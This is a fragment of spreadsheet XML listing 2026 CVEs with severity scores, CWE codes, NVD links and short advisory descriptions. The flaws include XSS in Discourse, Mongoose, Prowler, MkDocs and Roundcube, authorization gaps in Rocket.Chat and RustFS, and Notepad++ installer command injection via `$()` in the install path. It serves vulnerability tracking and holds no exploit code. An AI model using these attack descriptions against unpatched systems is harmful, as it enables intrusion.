          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4893" s="5" t="inlineStr"/>
      <c r="F4893" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4893" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4893" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4893" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4893" s="5" t="inlineStr"/>
      <c r="K4893" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L489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893" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72627</t>
        </is>
      </c>
    </row>
    <row r="4894">
      <c r="A4894" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4894" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72725</t>
        </is>
      </c>
      <c r="C4894" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4894" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4894" s="5" t="inlineStr"/>
      <c r="F4894" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4894" s="5" t="inlineStr"/>
      <c r="H4894" s="5" t="inlineStr"/>
      <c r="I4894" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J4894" s="5" t="inlineStr"/>
      <c r="K4894" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4894" s="5" t="inlineStr">
        <is>
          <t>Discourse is an open-source discussion platform. Prior to 2026.1.6, the staff action log model rendered unescaped previous and new value fields that could inject stored cross-site scripting into the staff interface. The issue is fixed in 2026.1.6, 2026.5.2, 2026.6.1, and 2026.7.0.</t>
        </is>
      </c>
      <c r="M4894" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72725</t>
        </is>
      </c>
    </row>
    <row r="4895">
      <c r="A4895" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4895" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72918</t>
        </is>
      </c>
      <c r="C4895" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4895" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4895" s="5" t="inlineStr"/>
      <c r="F4895" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4895" s="5" t="inlineStr"/>
      <c r="H4895" s="5" t="inlineStr"/>
      <c r="I4895" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J4895" s="5" t="inlineStr"/>
      <c r="K4895" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4895" s="5" t="inlineStr">
        <is>
          <t>Rocket.Chat is an open-source, secure, fully customizable communications platform. Prior to 7.10.14, 8.0.8, 8.1.7, 8.2.7, 8.3.7, 8.4.5, 8.5.2, and 8.6.1, the stream-notify-user stream in the WebSocket protocol allows an authenticated user to write arbitrary notification bodies because the sender is not checked, and the client-side UI can create an ephemeral fake message in another user's currently open chat. This issue is fixed in versions 7.10.14, 8.0.8, 8.1.7, 8.2.7, 8.3.7, 8.4.5, 8.5.2, and 8.6.1.</t>
        </is>
      </c>
      <c r="M4895" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72918</t>
        </is>
      </c>
    </row>
    <row r="4896">
      <c r="A4896" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4896" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73250</t>
        </is>
      </c>
      <c r="C4896" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4896" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4896" s="5" t="inlineStr"/>
      <c r="F4896" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4896" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4896" s="5" t="inlineStr"/>
      <c r="I4896" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J4896" s="5" t="inlineStr"/>
      <c r="K4896" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L4896" s="5" t="inlineStr">
        <is>
          <t>Notepad++ is a free and open-source source code editor. Prior to 8.9.7, the Notepad++ Windows 11 x64 and ARM64 installer passes the attacker-influenced installation directory `$INSTDIR` from PowerEditor/installer/nppSetup.nsi into a PowerShell `-Command` string used by RegisterMSIX to invoke Add-AppxPackage, allowing PowerShell subexpression syntax such as `$()` in the installation path to execute commands in the installer's security context when the context menu component is selected. This issue is fixed in version 8.9.7.</t>
        </is>
      </c>
      <c r="M4896" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73250</t>
        </is>
      </c>
    </row>
    <row r="4897">
      <c r="A4897" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4897" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73254</t>
        </is>
      </c>
      <c r="C4897" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4897" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4897" s="5" t="inlineStr"/>
      <c r="F4897" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4897" s="5" t="inlineStr"/>
      <c r="H4897" s="5" t="inlineStr"/>
      <c r="I4897" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J4897" s="5" t="inlineStr"/>
      <c r="K4897" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4897" s="5" t="inlineStr">
        <is>
          <t>Mongoose is an embedded web server and network library. Prior to 7.22, an attacker who can create a file with an HTML payload in its name can trigger stored cross-site scripting when a user browses a directory served with MG_ENABLE_DIRLIST. The printdirentry() path called by listdir() in src/http.c URL-encodes the href but inserts the raw filesystem filename into the HTML link text. The browser executes the injected markup in the Mongoose origin, which can expose session data or permit actions as the victim. This issue is fixed in version 7.22.</t>
        </is>
      </c>
      <c r="M4897" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73254</t>
        </is>
      </c>
    </row>
    <row r="4898">
      <c r="A4898" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4898" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73259</t>
        </is>
      </c>
      <c r="C4898" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4898" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4898" s="5" t="inlineStr"/>
      <c r="F4898" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4898" s="5" t="inlineStr"/>
      <c r="H4898" s="5" t="inlineStr"/>
      <c r="I4898" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J4898" s="5" t="inlineStr"/>
      <c r="K4898" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4898" s="5" t="inlineStr">
        <is>
          <t>Mongoose is an embedded web server and network library. Prior to 7.22, a remote attacker can send a crafted percent-encoded request path to a deployment using MG_ENABLE_DIRLIST and persuade a user to visit it. The mg_http_serve_dir() and listdir() path in src/http.c places the decoded request URI into the title and h1 elements without HTML entity encoding. The resulting reflected cross-site scripting executes in the Mongoose origin and can expose session data or perform actions as the victim. This issue is fixed in version 7.22.</t>
        </is>
      </c>
      <c r="M4898" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73259</t>
        </is>
      </c>
    </row>
    <row r="4899">
      <c r="A4899" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4899" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73262</t>
        </is>
      </c>
      <c r="C4899" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4899" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4899" s="5" t="inlineStr"/>
      <c r="F4899" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4899" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4899" s="5" t="inlineStr"/>
      <c r="I4899" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J4899" s="5" t="inlineStr"/>
      <c r="K4899" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4899" s="5" t="inlineStr">
        <is>
          <t>Prowler is a cloud security platform. Prior to 5.37.0, Prowler's HTML output formatter in prowler/lib/outputs/html/html.py inserted finding.resource_tags, assembled by unroll_dict and parse_html_string, into generated reports without HTML escaping, allowing a cloud principal who can modify a scanned resource tag to store HTML or JavaScript that executes when another user opens the report. This issue is fixed in version 5.37.0.</t>
        </is>
      </c>
      <c r="M4899" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73262</t>
        </is>
      </c>
    </row>
    <row r="4900">
      <c r="A4900" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4900" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73287</t>
        </is>
      </c>
      <c r="C4900" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4900" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4900" s="5" t="inlineStr"/>
      <c r="F4900" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4900" s="5" t="inlineStr"/>
      <c r="H4900" s="5" t="inlineStr"/>
      <c r="I4900" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J4900" s="5" t="inlineStr"/>
      <c r="K4900" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4900" s="5" t="inlineStr">
        <is>
          <t>RustFS is a distributed object storage system built in Rust. Prior to 1.0.0-beta.12, RustFS handles FTPS MKD in FtpsDriver::mkd in crates/protocols/src/ftps/driver.rs by calling storage.create_bucket without authorize_operation for S3Action::CreateBucket, allowing authenticated FTPS users denied s3:CreateBucket to create buckets. This issue is fixed in version 1.0.0-beta.12.</t>
        </is>
      </c>
      <c r="M4900" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73287</t>
        </is>
      </c>
    </row>
    <row r="4901">
      <c r="A4901" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4901" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73295</t>
        </is>
      </c>
      <c r="C4901" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4901" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4901" s="5" t="inlineStr"/>
      <c r="F4901" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4901" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4901" s="5" t="inlineStr"/>
      <c r="I4901" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J4901" s="5" t="inlineStr"/>
      <c r="K4901" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4901" s="5" t="inlineStr">
        <is>
          <t>Material for MkDocs is a powerful documentation framework built on top of MkDocs. From 7.2.0 until 9.7.7, the mountSearchSuggest function in src/templates/assets/javascripts/components/search/suggest/index.ts contains a DOM-based cross-site scripting vulnerability in the optional search.suggest feature that allows a crafted q URL parameter to execute JavaScript in a documentation site's origin after user interaction. This issue is fixed in version 9.7.7.</t>
        </is>
      </c>
      <c r="M4901" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73295</t>
        </is>
      </c>
    </row>
    <row r="4902">
      <c r="A4902" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4902" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74999</t>
        </is>
      </c>
      <c r="C4902" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4902" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4902" s="5" t="inlineStr"/>
      <c r="F4902" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4902" s="5" t="inlineStr"/>
      <c r="H4902" s="5" t="inlineStr">
        <is>
          <t>roundcube:webmail</t>
        </is>
      </c>
      <c r="I4902" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J4902" s="5" t="inlineStr"/>
      <c r="K4902" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4902" s="5" t="inlineStr">
        <is>
          <t>In Roundcube Webmail before 1.6.18 and 1.7.x before 1.7.3, the "Add to address book" action was subject to stored XSS.</t>
        </is>
      </c>
      <c r="M4902" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74999</t>
        </is>
      </c>
    </row>
    <row r="4903">
      <c r="A4903" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4903" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75629</t>
        </is>
      </c>
      <c r="C4903" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4903" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4903" s="5" t="inlineStr"/>
      <c r="F4903" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4903" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4903" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4903" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4903" s="5" t="inlineStr"/>
      <c r="K4903" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L490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03" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75629</t>
        </is>
      </c>
    </row>
    <row r="4904">
      <c r="A4904" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4904" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75635</t>
        </is>
      </c>
      <c r="C4904" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4904" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4904" s="5" t="inlineStr"/>
      <c r="F4904" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4904" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4904" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4904" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4904" s="5" t="inlineStr"/>
      <c r="K4904" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L490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04" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75635</t>
        </is>
      </c>
    </row>
    <row r="4905">
      <c r="A4905" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4905" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75636</t>
        </is>
      </c>
      <c r="C4905" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4905" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4905" s="5" t="inlineStr"/>
      <c r="F4905" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4905" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4905" s="5" t="inlineStr"/>
      <c r="I4905" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4905" s="5" t="inlineStr"/>
      <c r="K4905" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L490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05" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75636</t>
        </is>
      </c>
    </row>
    <row r="4906">
      <c r="A4906" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4906" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75637</t>
        </is>
      </c>
      <c r="C4906" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4906" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4906" s="5" t="inlineStr"/>
      <c r="F4906" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4906" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4906" s="5" t="inlineStr"/>
      <c r="I4906" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4906" s="5" t="inlineStr"/>
      <c r="K4906" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L490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06" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75637</t>
        </is>
      </c>
    </row>
    <row r="4907">
      <c r="A4907" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4907" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75639</t>
        </is>
      </c>
      <c r="C4907" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4907" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4907" s="5" t="inlineStr"/>
      <c r="F4907" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4907" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4907" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4907" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4907" s="5" t="inlineStr"/>
      <c r="K4907" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L490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07" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75639</t>
        </is>
      </c>
    </row>
    <row r="4908">
      <c r="A4908" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4908" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75640</t>
        </is>
      </c>
      <c r="C4908" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4908" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4908" s="5" t="inlineStr"/>
      <c r="F4908" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4908" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4908" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4908" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4908" s="5" t="inlineStr"/>
      <c r="K4908" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L490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08" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75640</t>
        </is>
      </c>
    </row>
    <row r="4909">
      <c r="A4909" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4909" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75642</t>
        </is>
      </c>
      <c r="C4909" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4909" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4909" s="5" t="inlineStr"/>
      <c r="F4909" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4909" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4909" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4909" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4909" s="5" t="inlineStr"/>
      <c r="K4909" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L490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909" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75642</t>
        </is>
      </c>
    </row>
    <row r="4910">
      <c r="A4910" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4910" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75643</t>
        </is>
      </c>
      <c r="C4910" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4910" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4910" s="5" t="inlineStr"/>
      <c r="F4910" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4910" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4910" s="5" t="inlineStr"/>
      <c r="I4910" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4910" s="5" t="inlineStr"/>
      <c r="K4910" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L491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910" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75643</t>
        </is>
      </c>
    </row>
    <row r="4911">
      <c r="A4911" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4911" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75644</t>
        </is>
      </c>
      <c r="C4911" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4911" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4911" s="5" t="inlineStr"/>
      <c r="F4911" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4911" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4911" s="5" t="inlineStr"/>
      <c r="I4911" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4911" s="5" t="inlineStr"/>
      <c r="K4911" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L491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911" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75644</t>
        </is>
      </c>
    </row>
    <row r="4912">
      <c r="A4912" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4912" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75646</t>
        </is>
      </c>
      <c r="C4912" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4912" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4912" s="5" t="inlineStr"/>
      <c r="F4912" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4912" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4912" s="5" t="inlineStr"/>
      <c r="I4912" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4912" s="5" t="inlineStr"/>
      <c r="K4912" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L491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12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75646</t>
        </is>
      </c>
    </row>
    <row r="4913">
      <c r="A4913" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4913" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75647</t>
        </is>
      </c>
      <c r="C4913" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4913" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4913" s="5" t="inlineStr"/>
      <c r="F4913" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4913" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4913" s="5" t="inlineStr"/>
      <c r="I4913" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4913" s="5" t="inlineStr"/>
      <c r="K4913" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L491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13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75647</t>
        </is>
      </c>
    </row>
    <row r="4914">
      <c r="A4914" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4914" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75651</t>
        </is>
      </c>
      <c r="C4914" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4914" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4914" s="5" t="inlineStr"/>
      <c r="F4914" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4914" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4914" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4914" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4914" s="5" t="inlineStr"/>
      <c r="K4914" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L491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14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75651</t>
        </is>
      </c>
    </row>
    <row r="4915">
      <c r="A4915" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4915" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75652</t>
        </is>
      </c>
      <c r="C4915" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4915" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4915" s="5" t="inlineStr"/>
      <c r="F4915" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4915" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4915" s="5" t="inlineStr"/>
      <c r="I4915" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4915" s="5" t="inlineStr"/>
      <c r="K4915" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L491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15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75652</t>
        </is>
      </c>
    </row>
    <row r="4916">
      <c r="A4916" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4916" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75657</t>
        </is>
      </c>
      <c r="C4916" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4916" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4916" s="5" t="inlineStr"/>
      <c r="F4916" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4916" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4916" s="5" t="inlineStr"/>
      <c r="I4916" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4916" s="5" t="inlineStr"/>
      <c r="K4916" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L491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16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75657</t>
        </is>
      </c>
    </row>
    <row r="4917">
      <c r="A4917" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4917" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75659</t>
        </is>
      </c>
      <c r="C4917" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4917" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4917" s="5" t="inlineStr"/>
      <c r="F4917" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4917" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4917" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
